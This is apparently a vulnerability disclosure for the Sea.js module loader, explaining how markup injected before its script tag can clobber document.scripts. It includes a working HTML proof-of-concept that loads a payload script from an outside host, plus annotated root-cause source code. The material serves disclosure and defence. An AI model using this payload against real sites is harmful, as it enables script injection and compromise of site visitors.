Sea.js is a module loader for the web. It is designed to change the way that you organize JavaScript. With Sea.js, it is a pleasure to build scalable web applications.
The Sea.js library reads the `src` attribute of the last element of `document.scripts` to locate its own `<script>` tag and derive the base directory from which additional modules are loaded. That lookup is DOM-clobberable: an attacker who can inject markup ahead of the sea.js `<script>` tag can shadow `document.scripts` with named elements and steer the `src` the loader trusts.
The CVE advisory only mentions versions ≤ 2.2.3, but the technique also appears to work against the latest release (3.0.3), which is what the PoC below targets.
<!-- user input: attacker-controlled markup injected BEFORE the sea.js <script> tag.
     Two <img name="scripts"> elements are used so that document.scripts resolves to a
     collection of named elements rather than a single element (presumably needed for
     scripts.length - 1 to index anything); the LAST one carries the payload URL, matching
     the loader's scripts[scripts.length - 1] lookup. -->
<img name="scripts">
<img name="scripts" src="https://gmsgadget.com/assets/xss/index.js">
<!-- The nonce attributes suggest the page runs under a nonce-based CSP; whether the module
     that sea.js fetches is then allowed to execute depends on that policy, which is not
     shown here. -->
<script nonce="secret" src="https://cdnjs.cloudflare.com/ajax/libs/seajs/3.0.3/sea.js"></script>
<script nonce="secret">
// Ordinary Sea.js bootstrap. "index" is presumably resolved against the base directory
// that sea.js derives from loaderDir, which the clobbered document.scripts has pointed at
// https://gmsgadget.com/assets/xss/ -- so this loads the attacker's index.js.
seajs.config({
alias: {
"jquery": "jquery/jquery/1.10.1/jquery.js"
}
});
seajs.use("index");
</script>
Root Cause
Source: https://github.com/seajs/seajs/blob/master/src/util-path.js#L231-L247
var doc = document
// NOTE(review): `document.scripts` is looked up on the document object, where named
// elements injected by an attacker (e.g. <img name="scripts">) can shadow the built-in
// collection (DOM clobbering, as the PoC on this page demonstrates). The value read here
// is then a collection of attacker-supplied elements rather than <script> elements.
var scripts = doc.scripts
// Recommend to add `seajsnode` id for the `sea.js` script element
// Fallback: the last entry of `scripts`, on the assumption that the sea.js <script> is the
// most recently parsed one. Nothing verifies that the chosen element is actually a <script>
// (e.g. via nodeName), so a clobbered collection hands an arbitrary element's `src` to the
// path logic below.
var loaderScript = doc.getElementById("seajsnode") ||
scripts[scripts.length - 1]
// Returns the absolute URL held in `node`'s src attribute.
// Browsers that implement hasAttribute expose it as the resolved `src` property;
// IE6/7 lack hasAttribute and need getAttribute(name, 4) to obtain the absolute form
// (see http://msdn.microsoft.com/en-us/library/ms536429(VS.85).aspx).
// NOTE(review): `node` is trusted as-is -- any element with a src, not only a <script>,
// yields its URL here.
function getScriptAbsoluteSrc(node) {
  if (node.hasAttribute) {
    // non-IE6/7
    return node.src
  }
  return node.getAttribute("src", 4)
}
// Absolute URL of the element chosen as the loader script; empty when that element has no
// src (inline sea.js) -- and attacker-controlled if `loaderScript` is not really a <script>
// element (see the DOM-clobbering PoC on this page).
loaderPath = getScriptAbsoluteSrc(loaderScript)
// When `sea.js` is inline, set loaderDir to current working directory
// `dirname` and `cwd` are defined elsewhere in the module. loaderDir presumably becomes the
// base against which module ids are resolved, so control over loaderPath means control over
// which script URLs the loader fetches -- TODO confirm against the resolver.
loaderDir = dirname(loaderPath || cwd)
Related links:
Found by jackfromeast, ishmeals.